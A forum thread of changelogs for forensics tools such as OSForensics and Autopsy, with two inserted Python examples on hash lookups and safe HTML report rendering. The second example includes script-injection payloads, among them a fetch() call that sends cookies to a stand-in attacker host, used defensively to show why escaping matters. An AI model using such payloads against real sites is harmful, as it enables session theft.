Case deletion is now done using a Case menu item and both single-user and general (not auto ingest) multi-user cases can be deleted.
Content viewers (bottom right area of desktop application) now resize correctly.
Some potential deadlocks during ingest have been eliminated.
Assorted performance improvements, enhancements, and bug fixes.

http://www.sleuthkit.org/autopsy/desc.php
Title: DiskMgr 0.9
Post by: SiLæncer on 15 August 2017, 22:00
(https://s26.postimg.org/yhg6ooh3t/screenshot_1123.jpg)
DiskMgr provides a user-friendly way to change DISK attributes in a Windows Forensic Environment (WinFE).

DiskMgr has both 32 and 64-Bit portable executables and is only for advanced users who understand and need to change their disk attributes. You can set your disk attributes to Offline, Online, Read-Only, and Read-Write.

DiskMgr makes setting your disk attributes super simple, but again, it should only be used by advanced users.

Freeware

http://reboot.pro/files/file/573-diskmgr/
Title: OSForensics 5.1.1003
Post by: SiLæncer on 28 August 2017, 09:19
Changelog

File Index
New Zoom indexer build, fixed bug that was failing to index particular .OST and .PST files with compression.
File Name Search
Fixed a crash which could occur in the hash set lookup function when the hash set being searched contained very long string lengths.
Thumbnail View, flags are now custom drawn to increase the speed when updating path flags, for example when doing hash matching.
Hash Lookup
Added support for 'Modeless' dialogs for hash lookup for multiple files. This allows other modules in OSF to be used simultaneously with hashing in the background.
Fixed dialog resizing screen corruption issues in the hashset lookup window
Reduced the frequency of updates to the user interface when a hash operation is running to improve speed. It looks slower, but is actually much much faster.
When performing a hash set lookup for multiple files, 4 threads and larger block sizes for disk reads are now used in order to increase performance. For large hashsets, with a fast SSD, performance improved 5-fold.
Added a limit of 1000 file set matches returned for a single file hash lookup. So 1 file on disk can now not match more than 1000 applications. Previously a zero length file would match 500,000 applications in the NSRL list.
Added a limit of 5 file set matches returned per file for multiple-file hash lookups. This dramatically improves speed when the hash set or the files being looked up contain matches in multiple file sets (e.g. when searching for file hashes in a set containing millions of records, such as NSRL hash sets).
Added caching of 0 byte / empty (contains only 0's) files to speed up multiple hash set lookups. Zero length files appear around 5000 times on a typical hard drive. So this can save 5000 slow database queries.
Hash Sets
Added a "Properties" right click menu item to display a dialog with some information about the hash set (disk location, number of product types, file sets, files).
Password recovery
Fixed a CSV formatting error when using the Copy row(s) to clipboard function if an item contained a ‘,’ character
Recent Activity
Fixed a bug where shellbag information was not being retrieved correctly when using “Scan drive” C: instead of live acquisition.
Fixed a CSV formatting error when using the Copy row(s) to clipboard function if an item contained a ‘,’ character
Fixed a bug where the last connected date of a USB item could be different in Live search when compared to a C: search

http://www.osforensics.com/
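The hash lookup entries in the post above describe two defences against the empty-file problem with large reference sets such as NSRL: a cap on how many file sets a single hash may be reported against, and caching the answer for zero-length or all-zero files so thousands of identical lookups become one. The following is an added example of mine, not OSForensics code, implementing both against a constructed in-memory hash set. The limits are the ones quoted in the changelog; the reference rows and sample files are made up.

```python
import hashlib
from collections import defaultdict

# Limits quoted in the changelog above
MAX_MATCHES_SINGLE_FILE = 1000   # one file may not match more than 1000 file sets
MAX_MATCHES_BULK_LOOKUP = 5      # per-file cap when looking up many files at once


def is_trivial(data: bytes) -> bool:
    """Zero-length, or consisting only of 0x00 bytes. Thousands of these exist on a
    typical drive and every file of a given length hashes to the same value."""
    return len(data) == 0 or data.count(0) == len(data)


class HashSet:
    """Constructed in-memory stand-in for an NSRL-style hash set: MD5 -> file sets.
    'queries' counts how often the backing store is hit, to make caching visible."""

    def __init__(self, rows):
        self.by_md5 = defaultdict(list)
        self.queries = 0
        for md5_hex, file_set in rows:
            self.by_md5[md5_hex].append(file_set)

    def query(self, md5_hex: str, limit: int) -> list:
        self.queries += 1
        return self.by_md5.get(md5_hex, [])[:limit]     # cap matches per file


class HashLookup:
    def __init__(self, hash_set: HashSet):
        self.hs = hash_set
        self._trivial_cache = {}   # (length, limit) -> (digests, matches)

    @staticmethod
    def digests(data: bytes) -> dict:
        return {algo: hashlib.new(algo, data).hexdigest() for algo in ("md5", "sha1")}

    def lookup(self, data: bytes, bulk: bool = False):
        """Return (digests, matching file sets), hitting the hash set at most once per
        distinct trivial file length rather than once per trivial file."""
        limit = MAX_MATCHES_BULK_LOOKUP if bulk else MAX_MATCHES_SINGLE_FILE
        if is_trivial(data):
            key = (len(data), limit)
            if key not in self._trivial_cache:
                d = self.digests(data)
                self._trivial_cache[key] = (d, self.hs.query(d["md5"], limit))
            return self._trivial_cache[key]
        d = self.digests(data)
        return d, self.hs.query(d["md5"], limit)


# Constructed evidence: three empty files, one all-zero file, one 'known' binary, one unknown
SAMPLE_EXE = b"MZ\x90\x00constructed sample executable"
SAMPLE_FILES = [
    ("a.txt", b""),
    ("b.log", b""),
    ("zeros.bin", b"\x00" * 16),
    ("c.txt", b""),
    ("sample.exe", SAMPLE_EXE),
    ("unknown.bin", b"not in any reference set"),
]


def build_constructed_hash_set() -> HashSet:
    """The empty file appears in 2,500 'products', plus one row for the sample binary."""
    empty_md5 = hashlib.md5(b"").hexdigest()
    rows = [(empty_md5, f"fileset-{i}") for i in range(2500)]
    rows.append((hashlib.md5(SAMPLE_EXE).hexdigest(), "fileset-sample-exe"))
    return HashSet(rows)


def run_bulk_lookup():
    """Look up every sample file in bulk mode; returns ({name: match count}, queries)."""
    hs = build_constructed_hash_set()
    lk = HashLookup(hs)
    results = {name: len(lk.lookup(data, bulk=True)[1]) for name, data in SAMPLE_FILES}
    return results, hs.queries


if __name__ == "__main__":
    counts, queries = run_bulk_lookup()
    print(counts, "backing-store queries:", queries)
```

Three empty files and one all-zero file cost two store queries instead of four, and the empty file reports 5 matches in bulk mode and 1000 in single-file mode rather than all 2,500 rows. Note that the cache key includes the length: an all-zero file of 16 bytes has a different digest from an empty one and must not share its result.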
Title: OSForensics 5.2.1000
Post by: SiLæncer on 10 October 2017, 09:09
Changelog

Triage Wizard (new)
Wizard launch icon on the Start page. A huge amount of data can now be rapidly collected by inexperienced users with a single click.
Customize Workflow
Now also removes icons from the Start page (and the menu).
It is possible to lock down the workflow with a password so inexperienced users can't re-enable all the features so easily.
Case Manager
Items added to a case can now be categorized into a type of crime; this list can be customised by editing the "Categories.txt" file in the ProgramData folder.
On the "Add to case" dialog, when using the "Use same details for all" option, if the title has not been changed by the user a special <Use item name> flag will be displayed. This will then be replaced by each item's name when added to the case.
PDF reporting bug fix.
Fixed sorting by clicking on a title in the Case Management window.
Added new tag <!--OSF_CASE_CASEINFOTABLE--> to customisable reports for generating the Case Info table. Only non-blank fields are output.
File Index
Fixed a buffer overflow bug due to illegally long filenames in ZIP files.
Recent Activity
Started sanitising the HTML output for some items when exporting to HTML so that HTML special characters (e.g. <>&) are safely encoded.
Thumbnail Viewer
Now has a faster option to switch between the various thumbnail files found on the drive via a drop-down list.
Drive Preparation
1-click drive preparation function. Can wipe, verify and format a drive with 1 click. A log file is also now written to the drive recording the preparation steps.
Hash Set Lookup
Added a check whether the SHA256 hash is stored in the hash set. If not, SHA256 is not calculated. This saves a small amount of CPU time.
Email Viewer
A bug fix for parsing some rare corrupted PST files.
Misc
Correction of various multi-threading bugs, which came to light when running a large number of tasks simultaneously. Registry access code wasn't thread safe and could crash if multiple tasks were reading registry entries at the same time, especially password recovery.
Caching of the disk's MFT into RAM didn't work well with multiple threads. The solution was to enlarge the cache slightly and unify it into a shared cache. Multiple threads should run significantly faster than before.
Some handles to various internal resources were not being freed, resulting in memory leaks and possible crashes.
Even larger cache sizes and a more advanced cache lookup algorithm to speed up various operations that involve reading the MFT (a RAM usage / speed trade-off). Slightly more RAM is used, but disk operations are faster. For example, file name searches are now 33% faster.
Some help file updates.
Fixed the opening of the Help file to get the navigation menu showing again. The Edge browser in Win10 unexpectedly broke some of the help functions.
Fixed a crash in the 32-bit version when trying to start a filename search.

http://www.osforensics.com/
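The "sanitising the HTML output" entry under Recent Activity in the post above deserves more attention than a one-line changelog gives it. Page titles, URLs and file names in an artifact report come straight from the evidence, so they are attacker-controlled; an unescaped HTML report is a stored script-injection vector against whoever opens it, typically the examiner or a reviewer on a better-connected machine. The block below is an added example of mine, not OSForensics code: the vulnerable concatenation beside an escaped version that additionally refuses to turn anything but http(s) URLs into clickable links. The artifacts are constructed.

```python
import html
from urllib.parse import urlsplit

# Constructed artifacts of the kind a Recent Activity export lists. The second and
# third rows carry payloads an attacker can plant simply by visiting a URL or
# naming a folder on the machine that is later examined.
SAMPLE_ARTIFACTS = [
    {"type": "Browser History", "title": "Example Domain", "url": "http://example.com/"},
    {"type": "Browser History",
     "title": "<script>fetch('http://evil.example/?c='+document.cookie)</script>",
     "url": "javascript:alert(document.domain)"},
    {"type": "Shellbag", "title": 'Report"><img src=x onerror=alert(1)>', "url": ""},
]


def render_unsafe(artifacts) -> str:
    """Vulnerable: evidence strings are concatenated straight into the report."""
    rows = []
    for a in artifacts:
        rows.append('<tr><td>%s</td><td>%s</td><td><a href="%s">%s</a></td></tr>'
                    % (a["type"], a["title"], a["url"], a["url"]))
    return "<table>" + "".join(rows) + "</table>"


def safe_href(url: str):
    """Attribute-context value for a link, or None if the URL must not be clickable.
    Only http and https are linked; javascript:, data:, file: etc. stay plain text."""
    if urlsplit(url).scheme.lower() in ("http", "https"):
        return html.escape(url, quote=True)     # quote=True also escapes " and '
    return None


def render_safe(artifacts) -> str:
    """Every evidence string is escaped for the context it lands in (text node or
    quoted attribute), and non-web URLs are shown but not linked."""
    rows = []
    for a in artifacts:
        href = safe_href(a["url"])
        shown = html.escape(a["url"])
        link = '<a href="%s">%s</a>' % (href, shown) if href else shown
        rows.append("<tr><td>%s</td><td>%s</td><td>%s</td></tr>"
                    % (html.escape(a["type"]), html.escape(a["title"]), link))
    return "<table>" + "".join(rows) + "</table>"


if __name__ == "__main__":
    print("UNSAFE:", render_unsafe(SAMPLE_ARTIFACTS))
    print("SAFE:  ", render_safe(SAMPLE_ARTIFACTS))
```

Escaping alone is not enough for the link column: `html.escape("javascript:alert(1)")` returns the string unchanged, so it would still execute inside an `href`. That is why the safe renderer decides per scheme whether a link is emitted at all, and why the same rule should apply to any `src` or `style` attribute a report template fills from evidence.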
Title: OSForensics 5.2.1001
Post by: SiLæncer on 18 October 2017, 14:00
Changelog

Recent Activity

    Fixed a crash that could occur when adding a filter when something other than "All" was selected in the treeview

Triage wizard

    Added "Manually carve files in unallocated clusters" suggested action
    Added "Generate new HTML report" and "Generate new PDF report" suggested actions.
    Fixed SysInfo "# commands completed" not updated properly on completion
    Fixed wording of several "Suggested Actions"
    Fixed BitLocker detection results appearing in System Information results
    'Manually search' suggested actions now automatically start the corresponding search
    Auto-generated HTML/PDF reports are now saved in separate "Triage PDF Report" and "Triage HTML Report" folders respectively
    Fixed underline/cursor/text colour confusion for list view text that are not links

http://www.osforensics.com/
Title: Autopsy 4.5.0
Post by: SiLæncer on 27 October 2017, 14:00
(https://s26.postimg.cc/915w3piwp/screenshot_1239.png)
Autopsy is a graphical interface to The Sleuth Kit and other analysis tools. It was designed to be an extensible platform so that it can be an end-to-end digital forensics solution that incorporates plug-in modules from both open and closed source projects. The application provides users with various analysis features and with the possibility of generating HTML or CSV reports as well.

License: GPL

Changelog

Memory usage has been reduced to improve support for very large cases.
New central repository feature has been added that allows you to correlate between cases and track if an item was previously identified as being "bad" or notable.
Message attachments are now associated with the message (and not just the source file). These can be found in the data sources and messages parts of the tree.
Credit card number search has added logic to reduce false positives based on number lengths.
Virtual directory nodes in the tree view are distinguished in the Data Sources tree by the addition of a "V" to their icon. These are folders that Autopsy/TSK created.
A new version of the automated ingest dashboard has been added to allow insight into pending, running and completed automated ingest jobs in automated ingest Examiner mode.
All occurrences of "Known Bad" in the user interface have been changed to "Notable."
Assorted small enhancements and bug fixes are included.

http://www.sleuthkit.org/autopsy
Title: OSForensics 5.2.1002
Post by: SiLæncer on 03 November 2017, 09:09
Changelog

Deleted File Search
Fixed a stack corruption crash.
SQLite Browser
Fixed an issue where OSF wasn't able to extract blob contents for SQLite tables created using WITHOUT ROWID.
Forensic Imaging
Fixed an error when attempting to image a locked BitLocker-encrypted drive. Instead of opening the drive letter (e.g. 'C:'), the underlying physical disk (e.g. \\.\PhysicalDrive0) is opened instead.
File Index
New Zoom indexer build with added support for indexing .sqlite, .sqlite2 and .sqlite3 files, and for identifying SQLite files with no extension.
Misc
Made some changes to how temporary files are created to make them thread safe (to prevent multi-threading issues when using the triage function).

http://www.osforensics.com/
Title: OSForensics 5.2.1003
Post by: SiLæncer on 23 November 2017, 20:00
Changelog

Browser Passwords
Fixed a crash that could occur when there were more than 50 Firefox usernames/passwords.
Disk Imaging
Allow continuation of imaging after encountering too many bad blocks (1000).
Added an extra check if the first read fails when verifying the image created.
System Information
Fixed a possible crash when getting printer info when the system returns bad information.
Fixed a crash in some cases when getting the computer name from the registry.
Misc
Fixed a bug where navigation bar icons were incorrect for items near the end/bottom.

http://www.osforensics.com/
Title: OSForensics 5.2.1004
Post by: SiLæncer on 14 December 2017, 19:00
Changelog

Case Report
Added the DLL required by wkhtmltopdf.exe to the installer to prevent an export-to-PDF error seen on Windows 8.
Rainbow Tables
Fixed a crash occurring when cracking hashes from a pwdump txt file when the secure case logger was enabled.
Recent Activity
Fixed a crash that could be caused by 0-length entries when processing Jump List items.
Triage Wizard
Fixed a crash caused by trial limitations when running the triage wizard.
Misc
Improved how temp files are stored to make it more thread-safe (e.g. when running multiple tasks using the Triage Wizard).

http://www.osforensics.com/
Title: OSForensics 5.2 Build 1005
Post by: SiLæncer on 22 February 2018, 09:13
Changelog

Disk test:

Fixed a crash when formatting as FAT32 fails.
Fixed an issue with formatting as FAT32 on small drives.

Deleted Files:

Fixed a crash that could occur in deleted file search when file carving is selected but the physical disk has been removed from the system
Fixed an uncaught exception error when loading MFT for some OSF devices.
Fixed a bug where raw whole disk carving was incorrectly returning progress, causing a possible crash when accessing the list.
Fixed error box appearing when failing to read non-resident MFT attributes (eg. LCN is invalid as the MFT attribute has been overwritten). Instead, the error is logged and the search silently continues
When parsing $ATTRIBUTE_LIST, buffer is now properly allocated according to the size of the attribute. Previously, this caused an assert error to occur due to the buffer size being too small

Internal Viewer:

Fixed potential memory leak when generating video thumbnails
Fixed potential concurrency issues when loading videos

Mismatch File Search:

Fixed a bug with the CSV export dialog displaying a .HTML file extension instead of .CSV

Password recovery:

Removed a "File not found" error when running the windows password search on a non system drive

System Information:

Fixed a possible crash when getting printer information

Triage Wizard:

Fixed an uncaught exception error that could occur when running a scan on a non system drive (eg D) and having only windows passwords selected.
Fixed a missing file error message that was displayed when running a scan on a non system drive (eg D) and having only windows passwords selected and 0 results were found

http://www.osforensics.com/
Title: Autopsy 4.6.0
Post by: SiLæncer on 23 February 2018, 18:00
Changelog

New Features:

A new Message content viewer was added to make it easier to view email message contents.
A new Communications interface was added to make it easier to find messages and relationships.
Hash sets can be centrally stored and shared in the Central Repository.
New Encryption Detection module that will flag possibly encrypted files.
Can more easily run Autopsy from a USB drive and leave few traces on target system.
Tag definitions now have a "notable" property. The Central Repository uses this to mark files as notable.
Large slack files are now file typed.
The maximum number of Solr connections and ingest threads have increased.
Periodic keyword search will dynamically change based on how long queries are taking.
Users can change the amount of memory allocated to the application.
The amount of memory required for processing keyword hits has been reduced.
Layout of HTML reports has been modified make it easier to open.
"Databases" was added to File Type by Extension view.
Users can now enter more information about cases including examiner, organization, etc.
New dialog to open multi-user cases that allows for searching.
Auto ingest metrics are collected and displayed in dashboard.
Auto ingest module that extracts disk images from archive files.
Keyword search has been made more responsive to both search and ingest job cancellation.
Number of log files to keep before rollover is now configurable.
Preliminary changes to make Linux and OS X builds easier.

Bug Fixes:

Memory leaks and other issues revealed by fuzzing the SleuthKit have been fixed.
Memory issues caused by Tika are fixed (by upgrading to 1.17)
Assorted small enhancements and bug fixes are included.

http://www.sleuthkit.org/autopsy
Title: OSForensics 5.2 Build 1006
Post by: SiLæncer on 26 February 2018, 09:07
Changelog

Case Manager
Report Fix, if the background thread copying files for report didn't exit cleanly OSF may warn of background activity when quitting.
Case Details Dialog
Fixed bug that might cause case narrative text to be reset to default when editing case details.
Will prompt user to confirm cancelling changes when they edited case details fields and clicking cancel.
Case Export
Changed text on "Cancel" button to "Close" on the Generate Report Dialog since custom logos are saved to config once changed in the dialog.

http://www.osforensics.com/
Title: OSForensics 5.2 Build 1007
Post by: SiLæncer on 16 March 2018, 09:10
What's new:

Recent Activity:

Fixed an error that could display when a jumplist was finished being processed

Registry Viewer:

Fixed a crash that could occur when reading a registry file

http://www.osforensics.com/
Title: OSFClone 1.3.1000
Post by: SiLæncer on 06 April 2018, 20:00
(https://i.postimg.cc/hG4zpJWz/screenshot-1643.png)
OSFClone is a free, self-booting solution which enables you to create or clone exact raw disk images quickly and independent of the installed operating system.

In addition to raw disk images, OSFClone also supports imaging drives to the open Advanced Forensics Format (AFF). AFF is an open and extensible format to store disk images and associated metadata. An open standard enables investigators to quickly and efficiently use their preferred tools for drive analysis. After creating or cloning a disk image, you can mount the image with PassMark OSFMount before conducting analysis with PassMark OSForensics™.

OSFClone creates a forensic image of a disk, preserving any unused sectors, slack space, file fragmentation and undeleted file records from the original hard drive. Boot into OSFClone and create disk clones of FAT, NTFS, and USB-connected drives! OSFClone can be booted from CD/DVD drives, or from USB flash drives.

Freeware

Changelog

Changed Linux OS to Porteus V4.0 RC4
Fixed bug with Compute Checksum calculation when choosing SHA256 and SHA512 would actually be computing SHA1.
Updated dc3dd to 7.2.646
Updated libewf to 20171104 (included libsmdev-20171112)
Updated afflib to 3.7.16
Updated aimage to 3.2.5
Updated ddrescue to 1.23
HFS+ filesystem supported for read/write.

http://osforensics.com/tools/create-disk-images.html
Title: Autopsy 4.7.0
Post by: SiLæncer on 09 May 2018, 21:30
Changelog

A graph visualization was added to the Communications tool to make it easier to find messages and relationships.
A new "Application" content viewer (lower right) that will contain file-type specific viewers (to reduce number of tabs).
New viewer for SQLite databases (in Application content viewer)
New viewer for binary PLists (in Application content viewer)
L01 files can be imported as data sources.
Ingest filters can now use date range conditions for triage.
Passwords to open password protected archive files can be entered (by right clicking on the file).
Reports (e.g., RegRipper output) generated by ingest modules are now indexed for keyword search.
PhotoRec carving module can be configured to keep corrupted files.
Sector size can be specified for local drives and images when E01 is wrong or it is a raw image.
New data source processor in Experimental module that runs Volatility, adds the outputs as files, and parses the reports to provide INTERESTING_FILE artifacts.
Assorted small enhancements are included.

http://www.sleuthkit.org/autopsy
Title: OSForensics 6.0.4 Beta
Post by: SiLæncer on 06 June 2018, 20:00
Changelog

Case Management:

Added "Export case" button
Added a list of reports that have been generated (in case directory or last known export directory)
When creating/editing case, user can now specify whether or not USB write-block should be enabled. Whenever the USB write-block settings are changed, a warning is displayed to the user to detach/re-attach connected USB devices for the settings to take effect.
Changed list view to allow groups (devices, reports, files etc) to be collapsible
Added last access date to case management when case is loaded
Fixed error copying files with long file paths when a report was created and the report contained deep / long paths.
Fixed a bug when creating a case report that was leaving a file handle open
Added support for encrypting PDF report
Added predefined offenses list to 'Offense' drop down list when creating/editing case
Case Details Dialog, fixed bug that might cause case narrative text to be reset to default when editing case details.
Case Details Dialog, will prompt user to confirm cancelling changes when they have edited case details fields and click Cancel.
Case Export, changed text on "Cancel" button to "Close" on the Generate Report Dialog since custom logos are saved to config once changed in the dialog.
Re-added "E-mail Delivery Time" to report and the associated timezone
Case load window was added at startup and when a case is loaded from the Case Management window. This is useful for showing load progress for very large cases with 10,000s of files in the case.
Report production progress window was added to show some progress activity when very large reports are produced.
New command line parameter to load a specific case (-C <PathToCaseFolder>). If the path does not exist or the CaseDetails.OSFCase file cannot be found, OSF will default to loading the last case used.

Create Index:

New indexing engine (Zoom V8 with multi-threaded offline indexing)
Much better indexing performance (3x speed increase)
Updated Create Index interface with new file type selections.
New "Memory optimization / Indexing Limits" step to bypass Pre-scan
Added support for user configurable number of indexing threads (up to 10)
Added options to enable/disable RAM drive
Improved RAM estimations and Indexing Limits settings
Improved indexing Status interface
Updated OSF interface to show multi-threaded indexing
Updated OSF Create Index options to offer more control with file type selection
Removed unnecessary indexing warnings
Added count display for Prescan
Added thousands grouping for large numbers shown in Create Index windows
Increased sleep/wait time while starting indexer to allow for a slower initialisation which could cause an error to be displayed
Renamed indexing process. Now using "OSFIndexer32.exe" and "OSFIndexer64.exe" instead of ZoomEngine32.exe and ZoomEngine64.exe, this should make it more obvious what is running in task manager.
Added some internal checking to clean up detached instances of OSFIndexer and temporary RAM drives.
Fixed a bug with indexing the complete content of e-mails in PST files that were text-only e-mails.

Deleted Files:

Column ordering, visibility and size now saved in OSForensics config file
Configuration options now saved in OSForensics config file
Fixed a crash caused by logging a magic number incorrectly when getting deleted files
Fixed uncaught exception error when loading MFT for some OSF devices
Fixed bug where raw whole disc carving was incorrectly returning progress, causing possible crash when accessing the list.
Added check for buffer overrun when looking for slack $I30 entries
Errors when parsing non-resident attributes of deleted MFT records no longer causes the search to terminate and throw an error message. This is an expected case. Errors are now written to the debug log and the process continues.
Fixed a crash that could occur in deleted file search when file carving is selected but the physical disk has been removed from the system
File Carver, added minimum file size option when carving. Changed "Reserved/Future Use" field in osf_filecarve.conf to "Min File Size"
File Carver, TIFF/CR2 extraction should be better.

Disk Imaging:

Added extra check if the first read fails when verifying the image created.

Disk Preparation:

Can now wipe BitLocked drives. Previously these drives appeared to be locked and could not be formatted.

Disk Test:

Fixed issue with formatting as FAT32 on small drives.
Fixed Crash when formatting as FAT32 fails.

E-mail Viewer:

E-mail times now include the timezone offset, both 'Delivery Time' and 'Client Submit Time'
Fixed printed e-mails missing e-mail addresses due to HTML entities not being escaped
Fixed bug where case item title set to '<Use item name>' when selecting 'Use same details for all'

File System Browser:

Added right-click menu option to jump to MFT record in the raw disk viewer
Fixed stack overflow when attempting to add device to case

File Name Search:

Added an "Uncheck all" menu item to uncheck currently selected items
Added 'Windows Shortcut Files' (i.e. .lnk files) to the file name search presets list
Column ordering, visibility and size now saved in OSForensics config file
Removed folders from results when filtering using hash set
When filtering using hash set, fixed bug with current file being added to results after cancelling search
'In hash set' flag is now set for results when hash set is used and made active
Added support for filtering by whether or not the file belongs in the hash set. This allows the user to search for files on disk that match a set of hash values
Re-arranged configuration dialog

Forensic Imaging:

Re-arranged tabs
Create Image, for physical disks, disk model and serial number are now saved in the info file
Added new 'Device and SMART Info' for displaying physical disk attributes + SMART info
Device & SMART Info, Added support for export and adding report to case
Device/SMART Info, added mouseover tooltip descriptions for SMART attributes

Forensics Copy:

Moved allocation of virtual disk image to thread to prevent system from being unresponsive

Hash Set:

Added option to create 'Quick hash set', allowing the user to quickly create a hash set by specifying a list of hashes
Fixed deleted hash set databases appearing in the file name search config drop down box
Re-organised buttons in main window
Added functionality for importing Project VIC JSON files with MD5 hashes & optimised the import load time.
Added default database name when importing VIC data set
Stopped navigation bar being disabled when importing hash set. User can now do other tasks in parallel to importing a large hash set.
Fixed hash set operation LED still "active" when there's an error
Fixed number display and file size formatting to be more readable for large import files (> 4GB)
When creating hash set databases, columns are no longer created for hashes that don't exist (e.g. VIC/NSRL datasets)

Hash set lookup:

Added right click menu option to open files in internal viewer
Fixed incorrect # files hashed text due to not updating the dialog once all files are hashed
When performing hash set lookups, hashes are no longer checked for columns that do not exist. This reduces the query time for large hash sets. e.g. we don't check for SHA1 matches if the particular hash set doesn't have SHA1 values.
When performing single file hash lookups, filename matches are no longer queried. This reduces the query time for large hash sets.

Install to USB:

Added help Link
Added separate "temp build" directory field when using WinPEBuilder.

Internal File Viewer:

EFS support. When an EFS file is now opened in the file viewer, a temp copy will be created and passed to the hex and text viewer. If the matching certificate has been installed on the system, the text should appear decrypted.
Hex View, added right-click option to add selected strings to case (as HTML file)
Fixed potential mem leak when generating video thumbnails
Fixed potential concurrency issues when loading videos

Memory viewer:

Column ordering, visibility and size now saved in OSForensics config file
Added button to add memory dump to case
Removed 'Error' text and icon from message box when process memory cannot be dumped because of access restrictions

Mismatch File Search:

Fixed a bug with the CSV export dialog displaying a .HTML file extension instead of .CSV

NSRL Hash Import:

Import 9x faster. While importing repeated file hashes, checks for duplicates are no longer done using a lookup on a non-indexed database (very slow). Now checks are done by comparing the product code between two consecutive lines in the input file.
Import will create new database automatically with default name based on date and time. Thus, incremental import is no longer an option.
New NSRL import config window to specify input and (temp) output folders
Temp Output folder can be specified so that user can specify RAM drive or SSD to speed up the import. Database is then moved from temp location to default hash sets location.
Updated help file with info about allocating enough space on a RAM drive.
Status now displays percentage counter during file importing

Password Recovery:

Added tab to allow PFX certificates to be installed on the local system, to facilitate opening EFS encrypted files when the certificate and password are available
Column ordering, visibility and size now saved in OSForensics config file
Browser passwords, made some changes to Firefox login recovery, now has a 64-bit and 32-bit helper executable (as Firefox has started distributing as 64-bit).
Registry passwords, now displaying password hint value next to 'NT Password' column. Displays '(empty)' if not present.
Registry Passwords, added support for Win10 Anniversary Update for live system in Forensics mode
Removed a "File not found" error when running the windows password search on a non system drive

Prefetch Viewer:

Added right-click option to export selected items to CSV

Rainbow Tables:

Fixed crash occurring when cracking hashes from a pwdump txt file - wrong data types were being passed to the format string when the secure case logger was enabled

Raw Disk Viewer:

Added progress window when carving to file
Renamed 'Decode' window to 'Disk Info'
Renamed 'Data Interpreter' window to 'Data Decode', split windows and shuffled content between the decode windows.
Added right-click menu options to 'Data Decode' window, Jump to File and Jump to File Record.
Clicking on file paths now opens the internal viewer
Clicking on LCN/offsets now jumps to the offset in the raw disk viewer
Data Interpreter window now shows the MFT record number and filepath if the current cursor position is inside the $MFT file
Fixed crash issue when sector size could not be determined
Fixed right-click "Jump to offset" not working some of the time

Recent Activity:

Added a quick filter option (text box and button) to quickly apply a text filter to recent activity items
"Show empty activity types" checkbox now defaults to on so empty types are displayed
Results are now sorted by Date (desc order) by default
Fixed possible crash when reading jumplist info

Registry Viewer:

Support for generating reports for known registry hives (currently only SOFTWARE hive at the moment)
Fixed a possible crash when processing a registry file

SQLite Browser:

Will check for Skype SQLite database files during "Scan for DB Files".
Resizeable Dialog/Controls
Option (enabled by default) to convert known timestamps to readable format
Scan Folder button is now more useful. Will now populate with locations of known SQLite files (e.g. Chrome and Firefox profile directories)
Scan Folder button will scan for known Android user data directory (where apps usually store their own data) on currently selected drive

System Information:

A new tab is now created for every new result
Added option to restore command lists back to default
Added "Recovery of Bitlocker Keys" to command list
Added ability to assign a name to an entered command. This name will then be displayed in the output/report.
Added support for Embedded Python 3.6.5
Removed the "Get" from the start of some item names.
Changed button text from 'Add...' to 'New...' when adding new commands
Moved 'Reset lists to default' option to dialog window. Added confirmation prompt to prevent accidental press.
Replaced spin control for moving items up/down due to overriding the handling of mouse wheel messages
Re-organized controls
Added command to get current clipboard contents
Added command to get anti malware (windows defender) software status
Added command to get current TPM status
Started encoding HTML special entities in output from tools so anything with HTML characters will display correctly
Fixed possible crash when getting printer info and the system returns bad information.

Triage Wizard (now renamed to Auto-Triage):

Changed Wizard icon to fingerprint icon & removed forensics dude. R.I.P. forensics dude, we loved you, but the world just wasn't ready for you.
Added option to create logical image with known system files
Added agent help text when mouse is hovering over a control
Added a free disk space check (for at least 1GB + memory size if memory dump selected)
Fixed an unhandled exception that could occur in the triage wizard when running a scan on a non-system drive (e.g. D) with only Windows passwords selected.
Fixed a missing file error message that was displayed when running a scan on a non-system drive (e.g. D) with only Windows passwords selected and 0 results were found
Fixed a crash caused by trial limitations when running the triage wizard

Web Browser:

Added status bar to browser.
Can now select export format as Web Archive Format (.mht) when exporting webpage.
Can now export linked PDF, ZIP and other files. Also added check boxes to allow user to select what is downloaded.
There is an option to download videos (MP4 format) from sites such as YouTube and add them to the case.
Added a progress indicator for downloading large files.

Misc:

Added colour coding of encrypted files displayed in a file list
Added exit confirmation message
Added warning message on OSF shutdown whenever the USB write-protect settings are changed during the course of execution
Fixed a long delay at startup when not running as Admin
Removed agent icon from feature description text on start window
After successfully saving a file to disk, fixed a bug with activity monitor displaying task is still active
Changed how temp files are stored, each thread now has a temp folder
Increased a timeout (from 60 seconds to 180 seconds) when trying to repair esedb databases with esentutl, as it was timing out during triage runs
To prevent machine from sleeping when running from USB, the mouse will jiggle if the time between user input (i.e. keyboard or mouse input) surpasses 10 secs.
Added DLL (MSVCR120.dll) required by wkhtmltopdf.exe to installer (error seen on windows )
Switched debug logging to logging library g3log for thread-safe, crash-safe, faster logging

http://www.osforensics.com/
Title: OSForensics 6.0.5 Beta
Post by: SiLæncer on 08 June, 2018, 19:00
What's new:

Big additions are Win10 Timeline extraction and OCR on images while indexing.
Fingers crossed, this will be the final beta release.

http://www.osforensics.com/
Title: OSForensics 6.0 Build 1000
Post by: SiLæncer on 22 June, 2018, 12:25
Changelog

Case Management:

Added "Export case" feature
Added a list of reports that have been generated (in case directory or last known export directory)
When creating/editing case, user can now specify whether or not USB write-block should be enabled. Whenever the USB write-block settings are changed, a warning is displayed to the user to detach/re-attach connected USB devices for the settings to take effect.
Changed list view to allow groups (devices, reports, files etc) to be collapsible
Added last access date to case management when case is loaded
Fixed error copying files with long file paths when a report was created and the report contained deep / long paths.
Fixed a bug when creating a case report that was leaving a file handle open
Added support for encrypting PDF report
Added predefined offenses list to 'Offense' drop down list when creating/editing case
Case Details Dialog, fixed bug that might cause case narrative text to be reset to default when editing case details.
Case Details Dialog, will prompt user to confirm cancelling changes when they have edited case details fields and click Cancel.
Case Export, changed text on "Cancel" button to "Close" on the Generate Report Dialog since custom logos are saved to config once changed in the dialog.
Re-added "E-mail Delivery Time" to report and the associated timezone
Case load window was added at startup and when a case is loaded from the Case Management window. This is useful for showing load progress for very large cases with 10,000s of files in the case.
Report production progress window was added to show some progress activity when very large reports are produced.
New command line parameter to load a specific case (-C <PathToCaseFolder>). If the path does not exist or the CaseDetails.OSFCase file cannot be found, OSF will default to loading the last case used.
Can now insert images into the case narrative text using the HTML editor. Images need to have already been added to the case. Previously images could be added, but the links where broken when a report was produced.
